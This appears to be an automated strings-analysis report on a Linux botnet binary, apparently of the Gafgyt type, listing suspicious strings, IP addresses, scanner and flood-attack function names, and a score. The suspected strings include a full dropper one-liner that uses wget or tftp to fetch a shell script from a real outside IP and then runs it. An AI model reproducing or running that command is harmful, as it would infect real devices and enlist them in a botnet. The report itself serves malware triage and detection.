=============================================================================
========	BINARY ID :427069dcbe5451a3c94f1191a5a290597229947d==================================================
================================================================================
================================================================================
========	STRINGS SUMMARY : =====================================================
================================================================================
TOTAL STRINGS COUNT :1197
SUPSCPECTED LINES COUNT :120
SUPSCPECTED STRINGS COUNT (DISTINCT) :23
SUPSCPECTED STRINGS WEIGHT :87
SUSPECT STRING SCORE : [87 / 150] 57%
USER AGENTS STRINGS COUNT :0
STATIC IPs STRINGS COUNT :2
DYNAMIC IPs STRINGS COUNT :1
================================================================================
========	STRINGS DETAILS : =====================================================
================================================================================
================================================================================
========	SUSPECTED STRINGS : =====================================================
================================================================================
busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n
/bin/sh
/proc/cpuinfo
PING
Invalid flag "%s"
GETLOCALIP
KILLATTK
/proc/net/route
%sWelcome to the botnet [%s:%s:%d cores] :)%s
%sCould not connect to commServer!%s\n
SCANNER
SCANNER ON | OFF
SCANNER STOPPED!
attempting to start scanner
SCANNER STARTED!
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
No such process
Interrupted system call
No child processes
Too many open files in system
Read-only file system
Level 2 not synchronized
Machine is not on the network
Name not unique on network
Interrupted system call should be restarted
Socket operation on non-socket
Protocol wrong type for socket
Socket type not supported
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
Transport endpoint is already connected
Transport endpoint is not connected
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
fdopen_pids
libc/sysdeps/linux/x86_64/vfork.S
fork.c
getpid.c
kill.c
sigprocmask.c
waitpid.c
spec_flags.4493
strstr.c
_string_syserrmsgs.c
inet_ntoa.c
inet_makeaddr.c
connect.c
socket.c
__malloc_largebin_index
rand.c
random.c
randtbl
random_r.c
random_poly_info
inet_aton.c
waitpid
random
connect
numpids
initConnection
sendTCP
getRandomPublicIP
__GI_random_r
getpid
getHost
__libc_getpid
makeRandomStr
getRandomIP
random_r
tcpcsum
socket
_string_syserrmsgs
__GI_inet_ntoa
getProperBinary
srandom_r
__GI_inet_ntoa_r
__GI_srandom_r
kill
__GI_sigprocmask
inet_addr
connectTimeout
__GI_kill
strstr
init_rand
rand
fork
__GI_random
__GI_fork
__GI_getpid
inet_aton
processCmd
__GI_socket
listFork
srand
inet_ntoa
sendUDP
__vfork
__libc_waitpid
__GI_waitpid
vfork
srandom
__libc_fork
scanPid
rand_cmwc
inet_ntoa_r
__GI_strstr
__GI_connect
__GI_inet_aton
__GI_vfork
__GI_inet_addr
__libc_connect
pids
sigprocmask
================================================================================
========	USER AGENTS STRINGS : =====================================================
================================================================================
================================================================================
========	STATIC IP ADRESSES : =====================================================
================================================================================
185.158.113.30:123
8.8.8.8
================================================================================
========	DYNAMIC IP MASKS : =====================================================
================================================================================
%d.%d.%d.%d
================================================================================
========	/proc FOLDER ACCESS : =====================================================
================================================================================
/proc/cpuinfo
/proc/net/route
================================================================================
========	HISTORY TEMPERING : =====================================================
================================================================================
================================================================================
========	AUTOINSTALL COMMANDS : =====================================================
================================================================================
